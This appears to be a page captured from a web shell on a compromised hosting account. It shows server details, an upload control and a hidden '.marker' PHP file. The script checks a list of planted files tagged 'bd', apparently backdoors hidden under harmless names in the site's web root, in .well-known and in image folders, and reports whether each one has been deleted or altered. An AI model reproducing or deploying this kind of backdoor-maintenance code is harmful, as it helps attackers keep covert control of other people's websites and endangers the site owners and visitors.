HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: /home/vitanhod/vigolic-1001.vitavit.com.pk/.marker
<?php   $r = '/home/vitanhod/vigolic-1001.vitavit.com.pk'; $x = ["/orderemail.php"=>"bd@@1310085@@68",
"/includes/configOnline.php"=>"bd@@1310187@@96",
"/orderemail_bk.php"=>"bd@@1310366@@60",
"/includes/config.php"=>"bd@@1310474@@13",
"/help_attachments.php"=>"bd@@1310558@@807",
"/.well-known/pki-validation/translations.php"=>"bd@@1310608@@1025",
"/img/articles_popular.php"=>"bd@@1310647@@1089",
"/.well-known/styles.php"=>"bd@@1310679@@1076",
"/includes/function.debug.php"=>"bd@@1309818@@989"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');